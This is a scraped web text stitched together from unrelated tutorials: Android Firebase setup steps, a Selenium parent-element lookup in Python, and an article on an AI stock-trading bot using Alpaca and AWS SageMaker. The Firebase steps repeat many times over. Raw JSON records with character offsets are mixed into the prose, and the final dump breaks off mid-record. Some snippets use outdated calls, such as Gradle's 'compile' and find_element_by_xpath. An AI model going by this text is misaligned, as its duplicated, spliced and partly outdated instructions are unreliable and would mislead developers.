android app option on the starting window.A prompt will open where to enter the package name of the app.Now the app is connected to the Firebase. Now all the cloud based as well server based services can be easily used in the app.Now the app will be registered with firebase.Also, the SHA1 certificate, can be given, of the app by following steps:Go to android studio project ↳ gradle ↳ root folder ↳ Tasks ↳ Android ↳ signingReport ↳ copy paste SHA1 from consoleNow download the google-services.json file and place it in the root directory of the android app.Now add the following in the project.Adding the sdk in the project.Add the following code to the PROJECT-LEVELbuild.gradle of the app.buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }}Add the following code to APP-LEVEL build.gradle of the app.dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services'Now Sync the gradle by clicking on sync now.After adding the above code(sdk), run the app to send the verification to the Firebase console. Create a firebase projectCreate a project by clicking on create project in the firebase console.Fill the necessary details in the pop up window about the project. Edit the project ID if required.Click on create project to finally create it. Create a project by clicking on create project in the firebase console. Fill the necessary details in the pop up window about the project. Edit the project ID if required. Click on create project to finally create it. Now add this project to the android appClick on the Add firebase to your android app option on the starting window.A prompt will open where to enter the package name of the app.Now the app is connected to the Firebase. Now all the cloud based as well server based services can be easily used in the app.Now the app will be registered with firebase. Click on the Add firebase to your android app option on the starting window. A prompt will open where to enter the package name of the app. Now the app is connected to the Firebase. Now all the cloud based as well server based services can be easily used in the app. Now the app will be registered with firebase. Also, the SHA1 certificate, can be given, of the app by following steps:Go to android studio project ↳ gradle ↳ root folder ↳ Tasks ↳ Android ↳ signingReport ↳ copy paste SHA1 from console Go to android studio project ↳ gradle ↳ root folder ↳ Tasks ↳ Android ↳ signingReport ↳ copy paste SHA1 from console Now download the google-services.json file and place it in the root directory of the android app. Now add the following in the project.Adding the sdk in the project.Add the following code to the PROJECT-LEVELbuild.gradle of the app.buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }}Add the following code to APP-LEVEL build.gradle of the app.dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services' Adding the sdk in the project.Add the following code to the PROJECT-LEVELbuild.gradle of the app.buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }} buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }} Add the following code to APP-LEVEL build.gradle of the app.dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services' dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services' Now Sync the gradle by clicking on sync now. After adding the above code(sdk), run the app to send the verification to the Firebase console. Firebase is now successfully installed. sumitgumber28 android Java Java Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Interfaces in Java ArrayList in Java Stack Class in Java Stream In Java Singleton Class in Java Set in Java Overriding in Java LinkedList in Java Collections in Java Initializing a List in Java
[ { "code": null, "e": 25296, "s": 25268, "text": "\n18 Oct, 2021" }, { "code": null, "e": 25603, "s": 25296, "text": "There are various services offered online such as storage, online processing, realtime database, authorisation of user etc. Google developed a platform called Firebase that provide all these online services. It also gives a daily analysis of usage of these services along with the details of user using it." }, { "code": null, "e": 25906, "s": 25603, "text": "To simplify, it can be said that Firebase is a mobile and web application development platform. It provides services that a web application or mobile application might require. Anyone can easily include firebase to there application and it will make their online work way easier than it was used to be." }, { "code": null, "e": 25961, "s": 25906, "text": "There are two ways to add firebase to any Android app:" }, { "code": null, "e": 26039, "s": 25961, "text": "Below are the steps to include Firebase to Android project in Android studio:" }, { "code": null, "e": 26638, "s": 26039, "text": "Update the android studio (>= 2.2)Create a new project in the firebase by clicking on the Add project.Now open the android studio and click on Tools in the upper left corner.Now click on the Firebase option in the drop down menu.A menu will appear on the right side of screen. It will show various services that Firebase offers. Choose the desired service.Now Click on the Connect to Firebase option in the menu of desired service.Add the dependencies of your service by clicking on the Add [YOUR SERVICE NAME] to the app option. (In the image below, the Firebase cloud messaging service is chosen)" }, { "code": null, "e": 26673, "s": 26638, "text": "Update the android studio (>= 2.2)" }, { "code": null, "e": 26742, "s": 26673, "text": "Create a new project in the firebase by clicking on the Add project." }, { "code": null, "e": 26815, "s": 26742, "text": "Now open the android studio and click on Tools in the upper left corner." }, { "code": null, "e": 26871, "s": 26815, "text": "Now click on the Firebase option in the drop down menu." }, { "code": null, "e": 26999, "s": 26871, "text": "A menu will appear on the right side of screen. It will show various services that Firebase offers. Choose the desired service." }, { "code": null, "e": 27075, "s": 26999, "text": "Now Click on the Connect to Firebase option in the menu of desired service." }, { "code": null, "e": 27243, "s": 27075, "text": "Add the dependencies of your service by clicking on the Add [YOUR SERVICE NAME] to the app option. (In the image below, the Firebase cloud messaging service is chosen)" }, { "code": null, "e": 27271, "s": 27243, "text": "In this, the steps involve:" }, { "code": null, "e": 28747, "s": 27271, "text": "Create a firebase projectCreate a project by clicking on create project in the firebase console.Fill the necessary details in the pop up window about the project. Edit the project ID if required.Click on create project to finally create it.Now add this project to the android appClick on the Add firebase to your android app option on the starting window.A prompt will open where to enter the package name of the app.Now the app is connected to the Firebase. Now all the cloud based as well server based services can be easily used in the app.Now the app will be registered with firebase.Also, the SHA1 certificate, can be given, of the app by following steps:Go to android studio project\n ↳ gradle\n ↳ root folder\n ↳ Tasks\n ↳ Android\n ↳ signingReport\n ↳ copy paste SHA1 from consoleNow download the google-services.json file and place it in the root directory of the android app.Now add the following in the project.Adding the sdk in the project.Add the following code to the PROJECT-LEVELbuild.gradle of the app.buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }}Add the following code to APP-LEVEL build.gradle of the app.dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services'Now Sync the gradle by clicking on sync now.After adding the above code(sdk), run the app to send the verification to the Firebase console." }, { "code": null, "e": 28988, "s": 28747, "text": "Create a firebase projectCreate a project by clicking on create project in the firebase console.Fill the necessary details in the pop up window about the project. Edit the project ID if required.Click on create project to finally create it." }, { "code": null, "e": 29060, "s": 28988, "text": "Create a project by clicking on create project in the firebase console." }, { "code": null, "e": 29160, "s": 29060, "text": "Fill the necessary details in the pop up window about the project. Edit the project ID if required." }, { "code": null, "e": 29206, "s": 29160, "text": "Click on create project to finally create it." }, { "code": null, "e": 29555, "s": 29206, "text": "Now add this project to the android appClick on the Add firebase to your android app option on the starting window.A prompt will open where to enter the package name of the app.Now the app is connected to the Firebase. Now all the cloud based as well server based services can be easily used in the app.Now the app will be registered with firebase." }, { "code": null, "e": 29632, "s": 29555, "text": "Click on the Add firebase to your android app option on the starting window." }, { "code": null, "e": 29695, "s": 29632, "text": "A prompt will open where to enter the package name of the app." }, { "code": null, "e": 29822, "s": 29695, "text": "Now the app is connected to the Firebase. Now all the cloud based as well server based services can be easily used in the app." }, { "code": null, "e": 29868, "s": 29822, "text": "Now the app will be registered with firebase." }, { "code": null, "e": 30093, "s": 29868, "text": "Also, the SHA1 certificate, can be given, of the app by following steps:Go to android studio project\n ↳ gradle\n ↳ root folder\n ↳ Tasks\n ↳ Android\n ↳ signingReport\n ↳ copy paste SHA1 from console" }, { "code": null, "e": 30246, "s": 30093, "text": "Go to android studio project\n ↳ gradle\n ↳ root folder\n ↳ Tasks\n ↳ Android\n ↳ signingReport\n ↳ copy paste SHA1 from console" }, { "code": null, "e": 30344, "s": 30246, "text": "Now download the google-services.json file and place it in the root directory of the android app." }, { "code": null, "e": 30772, "s": 30344, "text": "Now add the following in the project.Adding the sdk in the project.Add the following code to the PROJECT-LEVELbuild.gradle of the app.buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }}Add the following code to APP-LEVEL build.gradle of the app.dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services'" }, { "code": null, "e": 30955, "s": 30772, "text": "Adding the sdk in the project.Add the following code to the PROJECT-LEVELbuild.gradle of the app.buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }}" }, { "code": "buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }}", "e": 31041, "s": 30955, "text": null }, { "code": null, "e": 31250, "s": 31041, "text": "Add the following code to APP-LEVEL build.gradle of the app.dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services'" }, { "code": "dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services'", "e": 31399, "s": 31250, "text": null }, { "code": null, "e": 31444, "s": 31399, "text": "Now Sync the gradle by clicking on sync now." }, { "code": null, "e": 31540, "s": 31444, "text": "After adding the above code(sdk), run the app to send the verification to the Firebase console." }, { "code": null, "e": 31580, "s": 31540, "text": "Firebase is now successfully installed." }, { "code": null, "e": 31594, "s": 31580, "text": "sumitgumber28" }, { "code": null, "e": 31602, "s": 31594, "text": "android" }, { "code": null, "e": 31607, "s": 31602, "text": "Java" }, { "code": null, "e": 31612, "s": 31607, "text": "Java" }, { "code": null, "e": 31710, "s": 31612, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 31729, "s": 31710, "text": "Interfaces in Java" }, { "code": null, "e": 31747, "s": 31729, "text": "ArrayList in Java" }, { "code": null, "e": 31767, "s": 31747, "text": "Stack Class in Java" }, { "code": null, "e": 31782, "s": 31767, "text": "Stream In Java" }, { "code": null, "e": 31806, "s": 31782, "text": "Singleton Class in Java" }, { "code": null, "e": 31818, "s": 31806, "text": "Set in Java" }, { "code": null, "e": 31837, "s": 31818, "text": "Overriding in Java" }, { "code": null, "e": 31856, "s": 31837, "text": "LinkedList in Java" }, { "code": null, "e": 31876, "s": 31856, "text": "Collections in Java" } ]
How to find parent elements by python webdriver?
We can find parent elements with Selenium webdriver. First of all we need to identify the child element with help of any of the locators like id, class, name,xpath or css. Then we have to identify the parent element with the find_element_by_xpath() method. We can identify the parent from the child, by localizing it with the child and then passing (..) as a parameter to the find_element_by_xpath(). Syntax− child.find_element_by_xpath("..") Let us identify class attribute of parent ul from the child element li in below html code− The child element with class heading should be able to get the parent element having toc chapters class attribute. from selenium import webdriver driver = webdriver.Chrome(executable_path=" C:\\chromedriver.exe") driver.implicitly_wait(0.5) driver.get("https://www.tutorialspoint.com/about/about_careers.htm") #identify child element l= driver.find_element_by_xpath("//li[@class='heading']") #identify parent from child element with (..) in xpath t= l.find_element_by_xpath("..") # get_attribute() method to obtain class of parent print("Parent class attribute: " + t.get_attribute("class")) driver.close()
[ { "code": null, "e": 1319, "s": 1062, "text": "We can find parent elements with Selenium webdriver. First of all we need to identify the child element with help of any of the locators like id, class, name,xpath or css. Then we have to identify the parent element with the find_element_by_xpath() method." }, { "code": null, "e": 1463, "s": 1319, "text": "We can identify the parent from the child, by localizing it with the child and then passing (..) as a parameter to the find_element_by_xpath()." }, { "code": null, "e": 1471, "s": 1463, "text": "Syntax−" }, { "code": null, "e": 1505, "s": 1471, "text": "child.find_element_by_xpath(\"..\")" }, { "code": null, "e": 1596, "s": 1505, "text": "Let us identify class attribute of parent ul from the child element li in below html code−" }, { "code": null, "e": 1711, "s": 1596, "text": "The child element with class heading should be able to get the parent element having toc chapters class attribute." }, { "code": null, "e": 2203, "s": 1711, "text": "from selenium import webdriver\ndriver = webdriver.Chrome(executable_path=\"\nC:\\\\chromedriver.exe\")\ndriver.implicitly_wait(0.5)\ndriver.get(\"https://www.tutorialspoint.com/about/about_careers.htm\")\n#identify child element\nl= driver.find_element_by_xpath(\"//li[@class='heading']\")\n#identify parent from child element with (..) in xpath\nt= l.find_element_by_xpath(\"..\")\n# get_attribute() method to obtain class of parent\nprint(\"Parent class attribute: \" + t.get_attribute(\"class\"))\ndriver.close()" } ]
AI Stock Trading agent to predict stock prices | Towards Data Science
If you have followed the stock market recently, you would have noticed the wild swings due to COVID-19. It goes up a day and goes down another day, which AI might easily predict. Won’t it be wonderful to have a stock trading agent with AI powers to buy and sell stocks without the need to monitor hour by hour? So I decided to create a bot to trade. You would have seen many models that read from CSV’s and create a neural network, LSTM, or Deep Reinforcement Models(DRL). However, those models end up in a sandbox environment and are often tricky to use in a live environment. So I created the AI pipeline, which trades in real-time. After all, who does not want to make money in the stock market? So let’s get started. Below is the process we are going to follow to implement it. Alpaca Broker accountAlpaca python package for API tradingCollect data, EDA, feature engineeringAI model and TrainingAWS Cloud to host code and get predictionsCreate a lambda function and APITrade stocks automatically Alpaca Broker account Alpaca python package for API trading Collect data, EDA, feature engineering AI model and Training AWS Cloud to host code and get predictions Create a lambda function and API Trade stocks automatically Currently, most brokerage firms offer zero trading fees. However, not all brokerage firms have an API option to trade. Alpaca provides free trading with python API to trade. Once you create an account, you will have paper trading and live trading options. We can test the strategies in paper trading and implement them in live trading. It is just a key change for live trading. If you can have a local environment, you can install the pip package. Once installed, you can select Paper trading or Live trading. Based on your selection, you can get the API and secret key. Now, these keys will be used in our code. import alpaca_trade_api as tradeapiapi = tradeapi.REST('xxxxxxxx', 'xxxxxxxxxx',base_url='https://paper-api.alpaca.markets', api_version='v2',) Getting Data One advantage of using Alpaca is you can get historical data from polygon API. The timeframe can be from minute, hour, day, etc. Once you create the data frame, the chart should be something like this. Feature Engineering Like any data science project, we need to create features related to the dataset. Some part of the implementation was referred from this article. I have built around 430+ technical indicators from the above dataset. Features include momentum, trends, volatility, RSI, etc. Features have been created for each day. It can be easily created for hourly or any other timeframe. For some models which we are going to create, like LSTM, DRL we might need to use the original dataset. Creating labels and features is where we have to create logic to train our model. For now, I have used the logic from this paper. However, creating logic can be altered according to your needs. When performing unsupervised learning, you don’t require to create labels. Finally, the data needs to be scaled. Neural networks work better in scaled data. The first function will fit the scaler object using the train data, and the next function is used to scale any dataset. # scale train and test data to [-1, 1]def transform_scale(train): # fit scaler print(len(train.columns)) scaler = MinMaxScaler(feature_range=(-1, 1)) scaler = scaler.fit(train) # transform train return scaler# scale train and test data to [-1, 1]def scale(dataset, scaler): # transform train dataset = scaler.transform(dataset) print(dataset.shape) return dataset Once we create the model, we have to prepare our data as a data loader. The below function will perform it. def _get_train_data_loader(batch_size, train_data): print("Get train data loader.") train_X = torch.from_numpy(train_data.drop(['labels'],axis=1).values).float() train_Y = torch.from_numpy(train_data['labels'].values).float() train_ds = torch.utils.data.TensorDataset(train_X,train_Y)return torch.utils.data.DataLoader(train_ds,shuffle=False, batch_size=batch_size) In this section, we are going to create different types of models. However, these models might not be perfect for a time series dataset. I wanted to show how to use a deep learning model with a complete pipeline. Fully connected Deep NN Here we will create a fully connected deep neural network. The model itself is not fancy and I am not expecting to perform better. Also, it is not an appropriate model for time series data. I am using this model just to use all our features and for the sake of simplicity. However, we are starting with a basic model to complete our pipeline. In the next section, I will show how to create other types of models. Our model.py looks like the below one. import torch.nn as nnimport torch.nn.functional as F# define the CNN architectureclass Net(nn.Module): def __init__(self, hidden_dim, dropout =0.3): super(Net, self).__init__() # Number of features self.fc1 = nn.Linear(427, hidden_dim) self.fc2 = nn.Linear(hidden_dim, hidden_dim*2) self.fc3 = nn.Linear(hidden_dim*2, hidden_dim) self.fc4 = nn.Linear(hidden_dim, 32) self.fc5 = nn.Linear(32, 3) self.dropout = nn.Dropout(dropout) def forward(self, x): out = self.dropout(F.relu(self.fc1(x))) out = self.dropout(F.relu(self.fc2(out))) out = self.dropout(F.relu(self.fc3(out))) out = self.dropout(F.relu(self.fc4(out))) out = self.fc5(out) return out After creating the model and required transformations, we will create our training loop. We are going to train our model in AWS Sagemaker. It is completely an optional step. The model can be trained locally, and the model output file can be used for predictions. If you train it in the cloud, the below code can be used for Training. You also need an AWS account with the Sagemaker setup. If you need more info or help, please check my previous article, Train a GAN and generate faces using AWS Sagemaker | PyTorch setup section. Once you have all the required access, you can start fitting the model, as shown below. The command below will package all the necessary code with data, create an EC2 server with required containers, and train the model. from sagemaker.pytorch import PyTorch#Check the status of dataloaderestimator = PyTorch(entry_point="train.py", source_dir="train", role=role, framework_version='1.0.0', train_instance_count=1, train_instance_type='ml.p2.xlarge', hyperparameters={ 'epochs': 2, 'hidden_dim': 32, },) Once you train the model, all the corresponding files will be in your S3 bucket. If you train your model locally, make sure you have the files in the corresponding S3 bucket location. As our next setup, we will deploy the model in AWS Sagemaker. When deploying a PyTorch model in SageMaker, you are expected to provide four functions that the SageMaker inference container will use. model_fn: This function is the same function that we used in the training script, and it tells SageMaker how to load our model from the S3 bucket. input_fn: This function receives the raw serialized input sent to the model's endpoint, and its job is to de-serialize and make the input available for the inference code. Here we are going to create new data on a daily or hourly basis from Alpaca API. output_fn: This function takes the output of the inference code, and its job is to serialize this output and return it to the caller of the model's endpoint. This is where we will have our logic to trade. predict_fn: The heart of the inference script is where the actual prediction is done and is the function you will need to complete. Predictions will be made using underlying data. It has three outcomes Buy, Sell, and Hold. Below is the code to load the model and prepare the input data Some points to be noted in the above code: The model and scaler object need to be in an S3 bucket.We have fetched data for many days or hours. It is required for LSTM type networks.Input content is the ticker symbol. We can tune the code for multiple symbols. The model and scaler object need to be in an S3 bucket. We have fetched data for many days or hours. It is required for LSTM type networks. Input content is the ticker symbol. We can tune the code for multiple symbols. In the below code section, we will create the output and predict the function. Some points to be noted in the above code We have three classes buy, sell or hold. Prediction needs to be one of these three.We need to focus on what is predicted and returned.Trade only if there are enough funds (or limited funds) and in limited quantity. We have three classes buy, sell or hold. Prediction needs to be one of these three. We need to focus on what is predicted and returned. Trade only if there are enough funds (or limited funds) and in limited quantity. Deployment is similar to training the model. from sagemaker.predictor import RealTimePredictorfrom sagemaker.pytorch import PyTorchModelclass StringPredictor(RealTimePredictor): def __init__(self, endpoint_name, sagemaker_session): super(StringPredictor, self).__init__(endpoint_name, sagemaker_session, content_type='text/plain')model = PyTorchModel(model_data=estimator.model_data, role = role, framework_version='1.0.0', entry_point='predict.py', source_dir='../serve', predictor_cls=StringPredictor,)# Deploy the model in cloud serverpredictor = model.deploy(initial_instance_count=1, instance_type='ml.m5.large') If you want to test the model, you can execute the below code. This says that the workflow is working, and you can output your predictions and trade stocks on the issued ticker. You can also get the endpoint name from the above code in the screenshot. Here will complete the pipeline by creating the Lamda function and API. Create a Lambda function Create a lambda function in the AWS lambda service. Remember to update the Endpoint name from the above screenshot. API Gateway From AWS API gateway services, create a Rest API. Then give a name and create the API. Create a post and deploy from the Actions dropdown. Once you create it, the API is ready. You can use it in any UI if required. Finally, we have our Rest endpoint, where we can create post requests. The endpoint can be tested with Postman or any other tool. If you don’t need an endpoint, you can schedule the lambda function by following this link. Cheers! You can see that the stock is bought and sold in the Alpaca portal. Predictions are predicted from our model, and live data is fed into the model. We have trained a deep learning model and traded stocks using the output of the model in real-time. I still think there is room for improvement. I have used a deep neural network model here. You don’t need any model here. You can simply use your logic and create the pipeline.Better feature engineering and selection of those features can be performed.Different model architectures(like LSTM or DRL) need to be tested for time-series datasets.Backtesting needs to be performed on the training data. I have not covered backtesting in this article.The model can be retrained at frequent intervals. AWS Sagemaker provides an option without much hassle. I have used a deep neural network model here. You don’t need any model here. You can simply use your logic and create the pipeline. Better feature engineering and selection of those features can be performed. Different model architectures(like LSTM or DRL) need to be tested for time-series datasets. Backtesting needs to be performed on the training data. I have not covered backtesting in this article. The model can be retrained at frequent intervals. AWS Sagemaker provides an option without much hassle. If there is enough interest in the article, I will write a followup article on adding sentiment analysis about that particular stock in real-time with backtesting and add other model architectures. Note from Towards Data Science’s editors: While we allow independent authors to publish articles in accordance with our rules and guidelines, we do not endorse each author’s contribution. You should not rely on an author’s works without seeking professional advice. See our Reader Terms for details. This article is entirely informative. None of the content presented in this notebook constitutes a recommendation of any particular security. All trading strategies are used at your own risk. Questions? Comments? Feel free to leave your feedback in the comments section. Check out other articles 24x7 Live crypto trading | Buy Doge or any crypto using sentimentMake money using NFT + AI | GAN image generation 24x7 Live crypto trading | Buy Doge or any crypto using sentiment Make money using NFT + AI | GAN image generation Please subscribe to my newsletter to get the free working code for my articles and other updates. If you enjoyed this, please:
[ { "code": null, "e": 483, "s": 172, "text": "If you have followed the stock market recently, you would have noticed the wild swings due to COVID-19. It goes up a day and goes down another day, which AI might easily predict. Won’t it be wonderful to have a stock trading agent with AI powers to buy and sell stocks without the need to monitor hour by hour?" }, { "code": null, "e": 954, "s": 483, "text": "So I decided to create a bot to trade. You would have seen many models that read from CSV’s and create a neural network, LSTM, or Deep Reinforcement Models(DRL). However, those models end up in a sandbox environment and are often tricky to use in a live environment. So I created the AI pipeline, which trades in real-time. After all, who does not want to make money in the stock market? So let’s get started. Below is the process we are going to follow to implement it." }, { "code": null, "e": 1172, "s": 954, "text": "Alpaca Broker accountAlpaca python package for API tradingCollect data, EDA, feature engineeringAI model and TrainingAWS Cloud to host code and get predictionsCreate a lambda function and APITrade stocks automatically" }, { "code": null, "e": 1194, "s": 1172, "text": "Alpaca Broker account" }, { "code": null, "e": 1232, "s": 1194, "text": "Alpaca python package for API trading" }, { "code": null, "e": 1271, "s": 1232, "text": "Collect data, EDA, feature engineering" }, { "code": null, "e": 1293, "s": 1271, "text": "AI model and Training" }, { "code": null, "e": 1336, "s": 1293, "text": "AWS Cloud to host code and get predictions" }, { "code": null, "e": 1369, "s": 1336, "text": "Create a lambda function and API" }, { "code": null, "e": 1396, "s": 1369, "text": "Trade stocks automatically" }, { "code": null, "e": 1774, "s": 1396, "text": "Currently, most brokerage firms offer zero trading fees. However, not all brokerage firms have an API option to trade. Alpaca provides free trading with python API to trade. Once you create an account, you will have paper trading and live trading options. We can test the strategies in paper trading and implement them in live trading. It is just a key change for live trading." }, { "code": null, "e": 1906, "s": 1774, "text": "If you can have a local environment, you can install the pip package. Once installed, you can select Paper trading or Live trading." }, { "code": null, "e": 1967, "s": 1906, "text": "Based on your selection, you can get the API and secret key." }, { "code": null, "e": 2009, "s": 1967, "text": "Now, these keys will be used in our code." }, { "code": null, "e": 2153, "s": 2009, "text": "import alpaca_trade_api as tradeapiapi = tradeapi.REST('xxxxxxxx', 'xxxxxxxxxx',base_url='https://paper-api.alpaca.markets', api_version='v2',)" }, { "code": null, "e": 2166, "s": 2153, "text": "Getting Data" }, { "code": null, "e": 2368, "s": 2166, "text": "One advantage of using Alpaca is you can get historical data from polygon API. The timeframe can be from minute, hour, day, etc. Once you create the data frame, the chart should be something like this." }, { "code": null, "e": 2388, "s": 2368, "text": "Feature Engineering" }, { "code": null, "e": 2661, "s": 2388, "text": "Like any data science project, we need to create features related to the dataset. Some part of the implementation was referred from this article. I have built around 430+ technical indicators from the above dataset. Features include momentum, trends, volatility, RSI, etc." }, { "code": null, "e": 2866, "s": 2661, "text": "Features have been created for each day. It can be easily created for hourly or any other timeframe. For some models which we are going to create, like LSTM, DRL we might need to use the original dataset." }, { "code": null, "e": 2996, "s": 2866, "text": "Creating labels and features is where we have to create logic to train our model. For now, I have used the logic from this paper." }, { "code": null, "e": 3135, "s": 2996, "text": "However, creating logic can be altered according to your needs. When performing unsupervised learning, you don’t require to create labels." }, { "code": null, "e": 3337, "s": 3135, "text": "Finally, the data needs to be scaled. Neural networks work better in scaled data. The first function will fit the scaler object using the train data, and the next function is used to scale any dataset." }, { "code": null, "e": 3735, "s": 3337, "text": "# scale train and test data to [-1, 1]def transform_scale(train): # fit scaler print(len(train.columns)) scaler = MinMaxScaler(feature_range=(-1, 1)) scaler = scaler.fit(train) # transform train return scaler# scale train and test data to [-1, 1]def scale(dataset, scaler): # transform train dataset = scaler.transform(dataset) print(dataset.shape) return dataset" }, { "code": null, "e": 3843, "s": 3735, "text": "Once we create the model, we have to prepare our data as a data loader. The below function will perform it." }, { "code": null, "e": 4236, "s": 3843, "text": "def _get_train_data_loader(batch_size, train_data): print(\"Get train data loader.\") train_X = torch.from_numpy(train_data.drop(['labels'],axis=1).values).float() train_Y = torch.from_numpy(train_data['labels'].values).float() train_ds = torch.utils.data.TensorDataset(train_X,train_Y)return torch.utils.data.DataLoader(train_ds,shuffle=False, batch_size=batch_size)" }, { "code": null, "e": 4449, "s": 4236, "text": "In this section, we are going to create different types of models. However, these models might not be perfect for a time series dataset. I wanted to show how to use a deep learning model with a complete pipeline." }, { "code": null, "e": 4473, "s": 4449, "text": "Fully connected Deep NN" }, { "code": null, "e": 4746, "s": 4473, "text": "Here we will create a fully connected deep neural network. The model itself is not fancy and I am not expecting to perform better. Also, it is not an appropriate model for time series data. I am using this model just to use all our features and for the sake of simplicity." }, { "code": null, "e": 4925, "s": 4746, "text": "However, we are starting with a basic model to complete our pipeline. In the next section, I will show how to create other types of models. Our model.py looks like the below one." }, { "code": null, "e": 5782, "s": 4925, "text": "import torch.nn as nnimport torch.nn.functional as F# define the CNN architectureclass Net(nn.Module): def __init__(self, hidden_dim, dropout =0.3): super(Net, self).__init__() # Number of features self.fc1 = nn.Linear(427, hidden_dim) self.fc2 = nn.Linear(hidden_dim, hidden_dim*2) self.fc3 = nn.Linear(hidden_dim*2, hidden_dim) self.fc4 = nn.Linear(hidden_dim, 32) self.fc5 = nn.Linear(32, 3) self.dropout = nn.Dropout(dropout) def forward(self, x): out = self.dropout(F.relu(self.fc1(x))) out = self.dropout(F.relu(self.fc2(out))) out = self.dropout(F.relu(self.fc3(out))) out = self.dropout(F.relu(self.fc4(out))) out = self.fc5(out) return out" }, { "code": null, "e": 5871, "s": 5782, "text": "After creating the model and required transformations, we will create our training loop." }, { "code": null, "e": 6116, "s": 5871, "text": "We are going to train our model in AWS Sagemaker. It is completely an optional step. The model can be trained locally, and the model output file can be used for predictions. If you train it in the cloud, the below code can be used for Training." }, { "code": null, "e": 6312, "s": 6116, "text": "You also need an AWS account with the Sagemaker setup. If you need more info or help, please check my previous article, Train a GAN and generate faces using AWS Sagemaker | PyTorch setup section." }, { "code": null, "e": 6533, "s": 6312, "text": "Once you have all the required access, you can start fitting the model, as shown below. The command below will package all the necessary code with data, create an EC2 server with required containers, and train the model." }, { "code": null, "e": 6995, "s": 6533, "text": "from sagemaker.pytorch import PyTorch#Check the status of dataloaderestimator = PyTorch(entry_point=\"train.py\", source_dir=\"train\", role=role, framework_version='1.0.0', train_instance_count=1, train_instance_type='ml.p2.xlarge', hyperparameters={ 'epochs': 2, 'hidden_dim': 32, },)" }, { "code": null, "e": 7179, "s": 6995, "text": "Once you train the model, all the corresponding files will be in your S3 bucket. If you train your model locally, make sure you have the files in the corresponding S3 bucket location." }, { "code": null, "e": 7378, "s": 7179, "text": "As our next setup, we will deploy the model in AWS Sagemaker. When deploying a PyTorch model in SageMaker, you are expected to provide four functions that the SageMaker inference container will use." }, { "code": null, "e": 7525, "s": 7378, "text": "model_fn: This function is the same function that we used in the training script, and it tells SageMaker how to load our model from the S3 bucket." }, { "code": null, "e": 7778, "s": 7525, "text": "input_fn: This function receives the raw serialized input sent to the model's endpoint, and its job is to de-serialize and make the input available for the inference code. Here we are going to create new data on a daily or hourly basis from Alpaca API." }, { "code": null, "e": 7983, "s": 7778, "text": "output_fn: This function takes the output of the inference code, and its job is to serialize this output and return it to the caller of the model's endpoint. This is where we will have our logic to trade." }, { "code": null, "e": 8206, "s": 7983, "text": "predict_fn: The heart of the inference script is where the actual prediction is done and is the function you will need to complete. Predictions will be made using underlying data. It has three outcomes Buy, Sell, and Hold." }, { "code": null, "e": 8269, "s": 8206, "text": "Below is the code to load the model and prepare the input data" }, { "code": null, "e": 8312, "s": 8269, "text": "Some points to be noted in the above code:" }, { "code": null, "e": 8529, "s": 8312, "text": "The model and scaler object need to be in an S3 bucket.We have fetched data for many days or hours. It is required for LSTM type networks.Input content is the ticker symbol. We can tune the code for multiple symbols." }, { "code": null, "e": 8585, "s": 8529, "text": "The model and scaler object need to be in an S3 bucket." }, { "code": null, "e": 8669, "s": 8585, "text": "We have fetched data for many days or hours. It is required for LSTM type networks." }, { "code": null, "e": 8748, "s": 8669, "text": "Input content is the ticker symbol. We can tune the code for multiple symbols." }, { "code": null, "e": 8827, "s": 8748, "text": "In the below code section, we will create the output and predict the function." }, { "code": null, "e": 8869, "s": 8827, "text": "Some points to be noted in the above code" }, { "code": null, "e": 9084, "s": 8869, "text": "We have three classes buy, sell or hold. Prediction needs to be one of these three.We need to focus on what is predicted and returned.Trade only if there are enough funds (or limited funds) and in limited quantity." }, { "code": null, "e": 9168, "s": 9084, "text": "We have three classes buy, sell or hold. Prediction needs to be one of these three." }, { "code": null, "e": 9220, "s": 9168, "text": "We need to focus on what is predicted and returned." }, { "code": null, "e": 9301, "s": 9220, "text": "Trade only if there are enough funds (or limited funds) and in limited quantity." }, { "code": null, "e": 9346, "s": 9301, "text": "Deployment is similar to training the model." }, { "code": null, "e": 10029, "s": 9346, "text": "from sagemaker.predictor import RealTimePredictorfrom sagemaker.pytorch import PyTorchModelclass StringPredictor(RealTimePredictor): def __init__(self, endpoint_name, sagemaker_session): super(StringPredictor, self).__init__(endpoint_name, sagemaker_session, content_type='text/plain')model = PyTorchModel(model_data=estimator.model_data, role = role, framework_version='1.0.0', entry_point='predict.py', source_dir='../serve', predictor_cls=StringPredictor,)# Deploy the model in cloud serverpredictor = model.deploy(initial_instance_count=1, instance_type='ml.m5.large')" }, { "code": null, "e": 10207, "s": 10029, "text": "If you want to test the model, you can execute the below code. This says that the workflow is working, and you can output your predictions and trade stocks on the issued ticker." }, { "code": null, "e": 10281, "s": 10207, "text": "You can also get the endpoint name from the above code in the screenshot." }, { "code": null, "e": 10353, "s": 10281, "text": "Here will complete the pipeline by creating the Lamda function and API." }, { "code": null, "e": 10378, "s": 10353, "text": "Create a Lambda function" }, { "code": null, "e": 10494, "s": 10378, "text": "Create a lambda function in the AWS lambda service. Remember to update the Endpoint name from the above screenshot." }, { "code": null, "e": 10506, "s": 10494, "text": "API Gateway" }, { "code": null, "e": 10593, "s": 10506, 